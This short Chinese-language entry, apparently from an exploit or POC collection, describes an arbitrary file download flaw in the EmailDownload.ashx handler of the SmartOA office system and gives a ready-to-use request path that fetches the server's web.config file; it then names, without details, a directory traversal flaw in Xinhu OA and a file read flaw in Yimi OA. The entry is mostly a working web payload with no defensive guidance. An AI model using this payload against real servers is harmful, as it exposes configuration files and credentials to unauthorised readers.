智明 SmartOA EmailDownload.ashx文件存在任意文件下载漏洞,通过漏洞可下载服务器上的敏感文件,查看敏感信息
登录页面
验证POC
/file/EmailDownload.ashx?url=~/web.config&name=web.config
信呼OA beifenAction.php 后台目录遍历漏洞 一米OA getfile.jsp 任意文件读取漏洞